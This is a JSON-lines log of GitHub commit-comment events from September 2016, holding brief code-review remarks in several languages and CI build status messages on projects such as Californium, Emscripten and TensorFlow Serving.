{"id":"4590283696","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19097876,"position":null,"line":null,"path":null,"commit_id":"8ab247c875526a9826ff8ef0b60a622d85a12fe2","created_at":"2016-09-20T15:06:27Z","updated_at":"2016-09-20T15:06:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1072](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13657&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T15:06:27Z"}
{"id":"4590284206","type":"CommitCommentEvent","actor":{"login":"InsulaVentus"},"repo":{"name":"InsulaVentus/directory-listener"},"payload":{"comment":{"id":19097878,"position":null,"line":null,"path":null,"commit_id":"c4df313c381b19a90144f7f07138bea96da127fc","created_at":"2016-09-20T15:06:31Z","updated_at":"2016-09-20T15:06:31Z","body":"Thanks ;)"}},"created_at":"2016-09-20T15:06:31Z"}
{"id":"4590285178","type":"CommitCommentEvent","actor":{"login":"sujen1412"},"repo":{"name":"sujen1412/SciSpark"},"payload":{"comment":{"id":19097884,"position":123,"line":536,"path":"src/main/scala/org/dia/algorithms/mcc/MCCOps.scala","commit_id":"952a4a1100f2570f749d2e60244c41e1ee89b0b5","created_at":"2016-09-20T15:06:40Z","updated_at":"2016-09-20T15:06:40Z","body":"Yup, makes sense. "}},"created_at":"2016-09-20T15:06:40Z"}
{"id":"4590286656","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19097886,"position":33,"line":33,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageIdProvider.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-20T15:06:54Z","updated_at":"2016-09-20T15:06:54Z","body":"I suppose we should use something like an [LRU cache](https://github.com/eclipse/californium/blob/master/scandium-core/src/main/java/org/eclipse/californium/scandium/util/LeastRecentlyUsedCache.java) or an [expiringMap](https://github.com/jhalterman/expiringmap) ?\r\n\r\nI don't know what is better fixing the map size(with LRU) or limiting lifetime of mapentry(expiringMap)"}},"created_at":"2016-09-20T15:06:54Z"}
{"id":"4590289975","type":"CommitCommentEvent","actor":{"login":"pnbecker"},"repo":{"name":"DSpace/DSpace"},"payload":{"comment":{"id":19097891,"position":7,"line":112,"path":"dspace-api/src/test/java/org/dspace/content/ItemTest.java","commit_id":"9ad981cd982f01a569e961944224ea4bcc54c578","created_at":"2016-09-20T15:07:15Z","updated_at":"2016-09-20T15:07:15Z","body":"Well spotted @mwoodiupui!"}},"created_at":"2016-09-20T15:07:15Z"}
{"id":"4590291386","type":"CommitCommentEvent","actor":{"login":"cody3800"},"repo":{"name":"cody3800/cody3800.github.io"},"payload":{"comment":{"id":19097894,"position":5,"line":11,"path":"index.html","commit_id":"c898df866b1fca12ec4574e584a8b7d39a1f508a","created_at":"2016-09-20T15:07:27Z","updated_at":"2016-09-20T15:07:27Z","body":"wow man lol"}},"created_at":"2016-09-20T15:07:27Z"}
{"id":"4590299964","type":"CommitCommentEvent","actor":{"login":"fesor"},"repo":{"name":"MargaretSmoliakova/web-site"},"payload":{"comment":{"id":19097908,"position":23,"line":23,"path":"css/general.css","commit_id":"c72029ecbd58fee3b26bc65ed9cc450557cc5c66","created_at":"2016-09-20T15:08:43Z","updated_at":"2016-09-20T15:08:43Z","body":"Старайся не использовать ID-ки в стилях. Прочитай про каскадирование, чем плохо, про приоритеты селекторов. Суть в том что потом начинаются свистопляски с тем что должно быть главным и стили просто так начинают усложняться.\r\n\r\nКрайняя форма - полный отказ от каскадирования - BEM (Block-Element-Modifier)."}},"created_at":"2016-09-20T15:08:43Z"}
{"id":"4590303671","type":"CommitCommentEvent","actor":{"login":"elmindreda"},"repo":{"name":"glfw/glfw"},"payload":{"comment":{"id":19097917,"position":null,"line":null,"path":null,"commit_id":"f7584bf14cd470f581a505cd5d93aab20ee3fa78","created_at":"2016-09-20T15:09:16Z","updated_at":"2016-09-20T15:09:16Z","body":"Sorry, what I meant to say was that the compatibility profile is a vast ocean of confusion and I should be doing more to help point people new to OpenGL in the direction of the fast path."}},"created_at":"2016-09-20T15:09:16Z"}
{"id":"4590307622","type":"CommitCommentEvent","actor":{"login":"juj"},"repo":{"name":"juj/emscripten"},"payload":{"comment":{"id":19097928,"position":68,"line":345,"path":"system/lib/pthread/library_pthread.c","commit_id":"0112ddef856c854bb76fc06b691143db7d7cc220","created_at":"2016-09-20T15:09:53Z","updated_at":"2016-09-20T15:09:53Z","body":"Thanks, cleaned this up a bit."}},"created_at":"2016-09-20T15:09:53Z"}
{"id":"4590307873","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19097929,"position":27,"line":235,"path":"californium-core/src/main/java/org/eclipse/californium/core/CoapServer.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-20T15:09:55Z","updated_at":"2016-09-20T15:09:55Z","body":"I have looked into this some more and I think that I know what is happening. The problem occurs e.g. on test cases where we do a blockwise transfer that does not complete. In such cases the BlockCleanupTask scheduled by the BlockwiseLayer for the purpose of tidying up after EXCHANGE_LIFETIME is still pending and remains in the queue.\r\nThe solution is to simply ignore the remaining tasks after `executor.shutdownNow()` has been invoked since this invocation makes sure that the *future* tasks will not be executed anymore. However, `executor.awaitTermination()` always tries to wait for *all* remaining tasks to finish. I have already made an update to the code which now waits for max. one second and then simply shuts down."}},"created_at":"2016-09-20T15:09:55Z"}
{"id":"4590309865","type":"CommitCommentEvent","actor":{"login":"juj"},"repo":{"name":"juj/emscripten"},"payload":{"comment":{"id":19097938,"position":79,"line":356,"path":"system/lib/pthread/library_pthread.c","commit_id":"0112ddef856c854bb76fc06b691143db7d7cc220","created_at":"2016-09-20T15:10:13Z","updated_at":"2016-09-20T15:10:13Z","body":"Yeah, agreed."}},"created_at":"2016-09-20T15:10:13Z"}
{"id":"4590311060","type":"CommitCommentEvent","actor":{"login":"juj"},"repo":{"name":"juj/emscripten"},"payload":{"comment":{"id":19097941,"position":109,"line":386,"path":"system/lib/pthread/library_pthread.c","commit_id":"0112ddef856c854bb76fc06b691143db7d7cc220","created_at":"2016-09-20T15:10:23Z","updated_at":"2016-09-20T15:10:23Z","body":"Converted to use a ring buffer."}},"created_at":"2016-09-20T15:10:23Z"}
{"id":"4590315151","type":"CommitCommentEvent","actor":{"login":"alviteri"},"repo":{"name":"SonyAosp/vendor_sony"},"payload":{"comment":{"id":19097947,"position":null,"line":null,"path":null,"commit_id":"c630e5166e06a266e199e58d05918dd99c235d39","created_at":"2016-09-20T15:11:00Z","updated_at":"2016-09-20T15:11:00Z","body":"Hi .... Thanks .... Please make the changes and send the PR ...."}},"created_at":"2016-09-20T15:11:00Z"}
{"id":"4590316596","type":"CommitCommentEvent","actor":{"login":"rascarlo"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19097952,"position":null,"line":null,"path":null,"commit_id":"af00588c5a8f93e69ab1d0ac9733031d27c3721e","created_at":"2016-09-20T15:11:13Z","updated_at":"2016-09-20T15:11:13Z","body":"@marci4 @rodrigoswz @Garduna1976 added power tile string resources: lines 54 to 60 for string.xml.\r\nThanks guys!"}},"created_at":"2016-09-20T15:11:13Z"}
{"id":"4590318116","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19097956,"position":33,"line":33,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageIdProvider.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-20T15:11:26Z","updated_at":"2016-09-20T15:11:26Z","body":"Yes, I had the same thought. We are already limiting the total number of connections supported in Scandium if DTLS is used anyways. So we might as well use the same MAX_CONNECTIONS config param here, right?"}},"created_at":"2016-09-20T15:11:26Z"}
{"id":"4590321182","type":"CommitCommentEvent","actor":{"login":"cody3800"},"repo":{"name":"cody3800/cody3800.github.io"},"payload":{"comment":{"id":19097963,"position":null,"line":null,"path":null,"commit_id":"c898df866b1fca12ec4574e584a8b7d39a1f508a","created_at":"2016-09-20T15:11:54Z","updated_at":"2016-09-20T15:11:54Z","body":" that's not very nice :3"}},"created_at":"2016-09-20T15:11:54Z"}
{"id":"4590321938","type":"CommitCommentEvent","actor":{"login":"dpb587-pivotal"},"repo":{"name":"cloudfoundry/bosh-agent"},"payload":{"comment":{"id":19097965,"position":null,"line":null,"path":null,"commit_id":"0ba7fdfc30793e8cc80e3f3cbb60d1dd8f1b7f45","created_at":"2016-09-20T15:12:01Z","updated_at":"2016-09-20T15:12:01Z","body":"Cherry-picked from 3f064bbb72d0d647a7707f4081f45f68c9568c7e"}},"created_at":"2016-09-20T15:12:01Z"}
{"id":"4590321978","type":"CommitCommentEvent","actor":{"login":"treeowl"},"repo":{"name":"haskell/containers"},"payload":{"comment":{"id":19097966,"position":null,"line":null,"path":null,"commit_id":"30cee02e118ad67343834aed08c7e27b04858a31","created_at":"2016-09-20T15:12:01Z","updated_at":"2016-09-20T15:12:01Z","body":"I should let you know that I'm planning to change the representation of merge tactics to offer efficient `Functor`, `Category`, and `Applicative` instances, either for this release or for the next minor one. @wrengr also wants to change the types so the container functor (`Map k` or `IntMap`) is a parameter, allowing them to use the same tactic type (this shouldn't really bother much code). You can assume that there will be a function to run a `Matched` tactic on an element, and functions to run `Missing` tactics on elements and on subtrees (the latter will probably inline as soon as applied to the tactics). It would probably be best not to assume too much more about how tactics are represented."}},"created_at":"2016-09-20T15:12:01Z"}
{"id":"4590328349","type":"CommitCommentEvent","actor":{"login":"pablomh"},"repo":{"name":"SonyAosp/vendor_sony"},"payload":{"comment":{"id":19097997,"position":null,"line":null,"path":null,"commit_id":"c630e5166e06a266e199e58d05918dd99c235d39","created_at":"2016-09-20T15:13:00Z","updated_at":"2016-09-20T15:13:00Z","body":"Should I just remove the lib ones and leave the lib64 ones?"}},"created_at":"2016-09-20T15:13:00Z"}
{"id":"4590335130","type":"CommitCommentEvent","actor":{"login":"manleviet"},"repo":{"name":"manleviet/contactsapp"},"payload":{"comment":{"id":19098009,"position":null,"line":null,"path":null,"commit_id":"419afdb5a1b69da0b69b286cb60bd8680e0ffebd","created_at":"2016-09-20T15:14:02Z","updated_at":"2016-09-20T15:14:02Z","body":"Mã nguồn ổn. Tuy nhiên, cần bổ sung một số kỹ thuật cao cấp để mã nguồn ngắn gọn và uyển chuyển hơn:\r\n1. Thuộc tính\r\n2. Đọc và lưu dữ liệu ra tập tin"}},"created_at":"2016-09-20T15:14:02Z"}
{"id":"4590336039","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19098014,"position":null,"line":null,"path":null,"commit_id":"755a3c2537dd94401af061572845c4165dee4322","created_at":"2016-09-20T15:14:11Z","updated_at":"2016-09-20T15:14:11Z","body":"Yeah. Sorry to bother you with this. I tried with Firefox and I can't reproduce this. "}},"created_at":"2016-09-20T15:14:11Z"}
{"id":"4590339356","type":"CommitCommentEvent","actor":{"login":"thankjura"},"repo":{"name":"Heather/gentoo-gnome"},"payload":{"comment":{"id":19098020,"position":null,"line":null,"path":null,"commit_id":"fa6a6cc8cd7592fb0d03d7008bc622b26660a1c5","created_at":"2016-09-20T15:14:39Z","updated_at":"2016-09-20T15:14:39Z","body":"Ты еще не разобрался с gnome-shell? он почему то не грузит либы из /usr/lib/mutter, хотя в опциях компилятора есть"}},"created_at":"2016-09-20T15:14:39Z"}
{"id":"4590341089","type":"CommitCommentEvent","actor":{"login":"hjanetzek"},"repo":{"name":"tangrams/tangram-es"},"payload":{"comment":{"id":19098022,"position":54,"line":54,"path":"core/common/platform_gl.h","commit_id":"7286d0f544ef6de6eab5beb21be90a4b949773ae","created_at":"2016-09-20T15:14:54Z","updated_at":"2016-09-20T15:14:54Z","body":"@patriciogonzalezvivo Sure, sorry about this. Was this all needed to get it work on RPI? What about `#define GL_GLEXT_PROTOTYPES 1`"}},"created_at":"2016-09-20T15:14:54Z"}
{"id":"4590344029","type":"CommitCommentEvent","actor":{"login":"alanmcgovern"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":19098024,"position":8,"line":103,"path":"msbuild/Xamarin.iOS.Tasks.Core/Xamarin.WatchOS.App.Common.targets","commit_id":"4f5fc6d2638666f25b9b4ee88429f8e6f7948ba7","created_at":"2016-09-20T15:15:19Z","updated_at":"2016-09-20T15:15:19Z","body":"What happens for F# projects?"}},"created_at":"2016-09-20T15:15:19Z"}
{"id":"4590344219","type":"CommitCommentEvent","actor":{"login":"paphonbth"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19098025,"position":5,"line":0,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/notifications/NotificationHooks.java","commit_id":"b85c10bf01ef4711716430a559f2e705145daf05","created_at":"2016-09-20T15:15:21Z","updated_at":"2016-09-20T15:15:21Z","body":"Yep. L has heads-up."}},"created_at":"2016-09-20T15:15:21Z"}
{"id":"4590345312","type":"CommitCommentEvent","actor":{"login":"kirilg"},"repo":{"name":"tensorflow/serving"},"payload":{"comment":{"id":19098026,"position":247,"line":258,"path":"tensorflow_serving/g3doc/serving_advanced.md","commit_id":"156e52b9835ed2d84eda7da31845a5deb86b1abe","created_at":"2016-09-20T15:15:30Z","updated_at":"2016-09-20T15:15:30Z","body":"You're right! good catch. Do you want to send a PR with a fix or should I update this?"}},"created_at":"2016-09-20T15:15:30Z"}
{"id":"4590347558","type":"CommitCommentEvent","actor":{"login":"dotnetjunkie"},"repo":{"name":"dotnetjunkie/Mvc"},"payload":{"comment":{"id":19098030,"position":26,"line":26,"path":"src/Microsoft.AspNetCore.Mvc/ApplicationBuilderExtensions.cs","commit_id":"89957e06349ddc3a45977ff19c18d7087ebc6503","created_at":"2016-09-20T15:15:50Z","updated_at":"2016-09-20T15:15:50Z","body":"While the application developer uses its container of choice, the framework and 3rd party library keep using ASP.NET Core's configuration system (a.k.a. its built-in container). Making that same registration again in the application container (as you suggest) will not work, because both our application container and the framework's container get their own instance, and framework or 3rd party code will get one instance injected, while our application will us another. Besides this, such framework component often depends on other framework components, causing the application developer to reduplicate a large amount of configuration. Note that this was a non-existing problem before ASP.NET Core, since the old ASP.NET frameworks only had singletons components.\r\n\r\nWhat we must do instead, is tell the application container just enough, so that it can request that instance from the ASP.NET configuration system, but without taking ownership over that component (since we have no idea what the lifestyle of that component is). Best is to not inject that instance at all, but to inject a `Func<T>` into our own components (or rather into our adapters and leave our application components unaware of that framework component) that allow getting that instance according to the lifestyle as specified by the framework or the 3rd party library.\r\n\r\nThe `GetRequestServiceProvider()` method tries to solve this by creating that `Func<T>` for the required service. The `Func<T>` will return that instance from the framework’s `RequestServices` collection to make sure its lifestyle is preserved. This `Func<T>` can be registered (as singleton), or injected manually into an adapter. So we don’t register the `Func<T>` as factory to resolve a `T`; we allow that `Func<T>` itself to be resolved. An adapter or application component will depend on `Func<T>`; not on `T` directly. The Autofac registration would be `Register<Func<T>>`.\r\n\r\nAnother option is to actually register this `Func<T>` as factory to resolve a `T`. In other words, we do `Register<T>`. When such `T` is registered as `InstancePerRequest`, it would allow Autofac to detect if it were accidentally injected into a singleton, much like the detection Simple Injector does. Registering that component as Singleton is not wise, even if we know the component is currently registered as singleton, because we have no idea what future versions of the framework or 3rd party libraries will change. Downside of this approach is that the container doesn’t take ownership and accidentally disposes that instance, while it is still in use.\r\n"}},"created_at":"2016-09-20T15:15:50Z"}
{"id":"4590348063","type":"CommitCommentEvent","actor":{"login":"joylio"},"repo":{"name":"joylio/joyncong"},"payload":{"comment":{"id":19098032,"position":11,"line":11,"path":"Our Shared Goals/Dress Code.md","commit_id":"373708c67791f2cb5233addc5f59acf7c08f3f74","created_at":"2016-09-20T15:15:54Z","updated_at":"2016-09-20T15:15:54Z","body":"品位和腰围都不错"}},"created_at":"2016-09-20T15:15:54Z"}
{"id":"4590352648","type":"CommitCommentEvent","actor":{"login":"dotnetjunkie"},"repo":{"name":"dotnetjunkie/Mvc"},"payload":{"comment":{"id":19098049,"position":56,"line":56,"path":"src/Microsoft.AspNetCore.Mvc/ApplicationBuilderExtensions.cs","commit_id":"89957e06349ddc3a45977ff19c18d7087ebc6503","created_at":"2016-09-20T15:16:34Z","updated_at":"2016-09-20T15:16:34Z","body":"In my opinion: yes, it should be required. While it might make sense for 3rd party libraries and framework code to see whether some implementation is registered, it typically makes little sense for application components. It will usually expect that framework component. In the rare cases where such framework component is missing, the application can register a Null Object, or use a different method to get this optional service."}},"created_at":"2016-09-20T15:16:34Z"}
{"id":"4590358539","type":"CommitCommentEvent","actor":{"login":"joylio"},"repo":{"name":"joylio/joyncong"},"payload":{"comment":{"id":19098063,"position":15,"line":15,"path":"Our Shared Goals/Workouts.md","commit_id":"373708c67791f2cb5233addc5f59acf7c08f3f74","created_at":"2016-09-20T15:17:26Z","updated_at":"2016-09-20T15:17:26Z","body":"先好好吃好好增重~别和我比身材"}},"created_at":"2016-09-20T15:17:26Z"}
{"id":"4590364265","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19098083,"position":null,"line":null,"path":null,"commit_id":"7e19227245fc63508f1f4fcfc1a83583abb3f7da","created_at":"2016-09-20T15:18:16Z","updated_at":"2016-09-20T15:18:16Z","body":"for tests"}},"created_at":"2016-09-20T15:18:16Z"}
{"id":"4590365902","type":"CommitCommentEvent","actor":{"login":"wasdennnoch"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19098088,"position":5,"line":182,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/notifications/NotificationHooks.java","commit_id":"b85c10bf01ef4711716430a559f2e705145daf05","created_at":"2016-09-20T15:18:31Z","updated_at":"2016-09-20T15:18:31Z","body":"Never saw a heads-up on L. But anyways the manager isn't in that class. "}},"created_at":"2016-09-20T15:18:31Z"}
{"id":"4590366219","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19098090,"position":null,"line":null,"path":null,"commit_id":"8ab247c875526a9826ff8ef0b60a622d85a12fe2","created_at":"2016-09-20T15:18:33Z","updated_at":"2016-09-20T15:18:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1072](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13657&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 242, ignored: 3 Build time: 00:12:07"}},"created_at":"2016-09-20T15:18:33Z"}
{"id":"4590367752","type":"CommitCommentEvent","actor":{"login":"dotnetjunkie"},"repo":{"name":"dotnetjunkie/Mvc"},"payload":{"comment":{"id":19098094,"position":29,"line":29,"path":"src/Microsoft.AspNetCore.Mvc/UseExtensions.cs","commit_id":"89957e06349ddc3a45977ff19c18d7087ebc6503","created_at":"2016-09-20T15:18:47Z","updated_at":"2016-09-20T15:18:47Z","body":"A developer could call `builder.Use(async (context, next) => { using (etc) { etc })` himself. This method is intended to simplify wrapping a request in a lifetime scope."}},"created_at":"2016-09-20T15:18:47Z"}
{"id":"4590368124","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19098097,"position":null,"line":null,"path":null,"commit_id":"267558b8d6694e56c6cb103056e24fdb53064fb0","created_at":"2016-09-20T15:18:50Z","updated_at":"2016-09-20T15:18:50Z","body":"ASIHPValidation (shenb) - x86_64-MacOS-10.9-clang: OK (2325 of 2332 tests passed, 3 test warnings)\n\n * 10 tests had: AUD diffs.\n * 10 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T15:18:50Z"}
{"id":"4590369046","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19098100,"position":213,"line":213,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageExchangeStore.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-20T15:18:58Z","updated_at":"2016-09-20T15:18:58Z","body":"this, however will introduce a dependency on `ObservationStore`. We might as well opt for simply *integrating* the `ObservationStore` into the `MessageExchangeStore` ..."}},"created_at":"2016-09-20T15:18:58Z"}
{"id":"4590373658","type":"CommitCommentEvent","actor":{"login":"xxzbuckxx"},"repo":{"name":"xxzbuckxx/PythonSafeKeeper"},"payload":{"comment":{"id":19098106,"position":417,"line":417,"path":"Desktop/projects/Python/Safe Keeper/SafeKeeper.py","commit_id":"ec392be38f9a45d7ef6c8d5ae7f2f4c7406516fa","created_at":"2016-09-20T15:19:38Z","updated_at":"2016-09-20T15:19:38Z","body":"Delete"}},"created_at":"2016-09-20T15:19:38Z"}
{"id":"4590374236","type":"CommitCommentEvent","actor":{"login":"juj"},"repo":{"name":"juj/emscripten"},"payload":{"comment":{"id":19098107,"position":109,"line":386,"path":"system/lib/pthread/library_pthread.c","commit_id":"0112ddef856c854bb76fc06b691143db7d7cc220","created_at":"2016-09-20T15:19:42Z","updated_at":"2016-09-20T15:19:42Z","body":"After some deliberation, choosing to go ahead with this, although there is a slight footgun possible that developer's need to be careful, i.e. this won't allow DOM access in `--proxy-to-worker` mode. Currently working on providing a separate mechanism for those types of builds. Posted PR #4569 which has the code from this commit with tests and reviews addressed."}},"created_at":"2016-09-20T15:19:42Z"}
{"id":"4590377566","type":"CommitCommentEvent","actor":{"login":"lvman"},"repo":{"name":"manleviet/contactsapp"},"payload":{"comment":{"id":19098113,"position":null,"line":null,"path":null,"commit_id":"419afdb5a1b69da0b69b286cb60bd8680e0ffebd","created_at":"2016-09-20T15:20:13Z","updated_at":"2016-09-20T15:20:13Z","body":"@manleviet ok, í kiến hay, mình đề nghị kiểm tra thêm độ dài của ký tự trong thuộc tính"}},"created_at":"2016-09-20T15:20:13Z"}
{"id":"4590378237","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19098115,"position":343,"line":343,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageExchangeStore.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-20T15:20:18Z","updated_at":"2016-09-20T15:20:18Z","body":"fixed in 5db095ac743383443c3e7c0350b11d2e68f0752f"}},"created_at":"2016-09-20T15:20:18Z"}
{"id":"4590381198","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19098118,"position":68,"line":68,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/BaseMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-20T15:20:44Z","updated_at":"2016-09-20T15:20:44Z","body":"fixed in 5db095ac743383443c3e7c0350b11d2e68f0752f"}},"created_at":"2016-09-20T15:20:44Z"}
{"id":"4590385064","type":"CommitCommentEvent","actor":{"login":"rayglover-ibm"},"repo":{"name":"tensorflow/serving"},"payload":{"comment":{"id":19098124,"position":247,"line":258,"path":"tensorflow_serving/g3doc/serving_advanced.md","commit_id":"156e52b9835ed2d84eda7da31845a5deb86b1abe","created_at":"2016-09-20T15:21:18Z","updated_at":"2016-09-20T15:21:18Z","body":"Getting legal approval for a PR would take me about 6 months so I recommend you update!"}},"created_at":"2016-09-20T15:21:18Z"}
{"id":"4590385679","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19098127,"position":55,"line":73,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/deduplication/CropRotation.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-20T15:21:23Z","updated_at":"2016-09-20T15:21:23Z","body":"fixed in 5db095ac743383443c3e7c0350b11d2e68f0752f"}},"created_at":"2016-09-20T15:21:23Z"}
{"id":"4590387023","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19098129,"position":99,"line":88,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/deduplication/SweepDeduplicator.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-20T15:21:35Z","updated_at":"2016-09-20T15:21:35Z","body":"fixed in 5db095ac743383443c3e7c0350b11d2e68f0752f"}},"created_at":"2016-09-20T15:21:35Z"}
{"id":"4590388149","type":"CommitCommentEvent","actor":{"login":"jmeas"},"repo":{"name":"jmeas/moment-business"},"payload":{"comment":{"id":19098132,"position":null,"line":null,"path":null,"commit_id":"001dd0991be28085e5b91ebf5938357324bece33","created_at":"2016-09-20T15:21:44Z","updated_at":"2016-09-20T15:21:44Z","body":"All thanks goes to @leobetosouza :)"}},"created_at":"2016-09-20T15:21:44Z"}
{"id":"4590389632","type":"CommitCommentEvent","actor":{"login":"pablomh"},"repo":{"name":"SonyAosp/vendor_sony"},"payload":{"comment":{"id":19098135,"position":null,"line":null,"path":null,"commit_id":"c630e5166e06a266e199e58d05918dd99c235d39","created_at":"2016-09-20T15:21:57Z","updated_at":"2016-09-20T15:21:57Z","body":"My current test is to revert the changes to the two kanuti-tulip files. Once it's OK I'll open the PR."}},"created_at":"2016-09-20T15:21:57Z"}
{"id":"4590390558","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19098137,"position":27,"line":235,"path":"californium-core/src/main/java/org/eclipse/californium/core/CoapServer.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-20T15:22:06Z","updated_at":"2016-09-20T15:22:06Z","body":"see ad6850b93c93aaf33d5a1ce201d8f799b38f486b"}},"created_at":"2016-09-20T15:22:06Z"}
{"id":"4590398134","type":"CommitCommentEvent","actor":{"login":"patriciogonzalezvivo"},"repo":{"name":"tangrams/tangram-es"},"payload":{"comment":{"id":19098153,"position":54,"line":54,"path":"core/common/platform_gl.h","commit_id":"7286d0f544ef6de6eab5beb21be90a4b949773ae","created_at":"2016-09-20T15:23:10Z","updated_at":"2016-09-20T15:23:10Z","body":"Adding those things it compiles and runs. I didn't try `#define GL_GLEXT_PROTOTYPES 1`. \r\n\r\nOn other note: I'm having problems generating FBOs with Depth buffer... any idea way?"}},"created_at":"2016-09-20T15:23:10Z"}
{"id":"4590399559","type":"CommitCommentEvent","actor":{"login":"xxzbuckxx"},"repo":{"name":"xxzbuckxx/PythonSafeKeeper"},"payload":{"comment":{"id":19098155,"position":254,"line":254,"path":"Desktop/projects/Python/Safe Keeper/SafeKeeper.py","commit_id":"ec392be38f9a45d7ef6c8d5ae7f2f4c7406516fa","created_at":"2016-09-20T15:23:22Z","updated_at":"2016-09-20T15:23:22Z","body":"Figure out how to store whole variable, not just username...\r\n     Individual Document for each?\r\n     Individual Line for each?\r\nTBD\r\n"}},"created_at":"2016-09-20T15:23:22Z"}
{"id":"4590400116","type":"CommitCommentEvent","actor":{"login":"manleviet"},"repo":{"name":"manleviet/contactsapp"},"payload":{"comment":{"id":19098157,"position":null,"line":null,"path":null,"commit_id":"419afdb5a1b69da0b69b286cb60bd8680e0ffebd","created_at":"2016-09-20T15:23:27Z","updated_at":"2016-09-20T15:23:27Z","body":"Bạn hãy tạo Project và quản lý các issue và gán người xử lý đi"}},"created_at":"2016-09-20T15:23:27Z"}
{"id":"4590402842","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19098172,"position":4,"line":11,"path":"app/controllers/api/providers_controller.rb","commit_id":"b5681ad3ddbdfea2ee9fe3911f7cadab0631af4f","created_at":"2016-09-20T15:23:51Z","updated_at":"2016-09-20T15:23:51Z","body":"es importante mantener la raíz"}},"created_at":"2016-09-20T15:23:51Z"}
{"id":"4590403300","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19098175,"position":null,"line":null,"path":null,"commit_id":"a795283e659e1c21866b922990b698ad7c0e6438","created_at":"2016-09-20T15:23:55Z","updated_at":"2016-09-20T15:23:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1073](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13664&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T15:23:55Z"}
{"id":"4590404011","type":"CommitCommentEvent","actor":{"login":"OliverJAsh"},"repo":{"name":"cubik-oss/redux-reducer-effects"},"payload":{"comment":{"id":19098181,"position":4,"line":4,"path":".gitignore","commit_id":"4a1a6acb134530c1a0653edac67efe4bc92d1d59","created_at":"2016-09-20T15:24:00Z","updated_at":"2016-09-20T15:24:00Z","body":"Why is this needed? Isn't it compiled into one of the target dirs?"}},"created_at":"2016-09-20T15:24:00Z"}
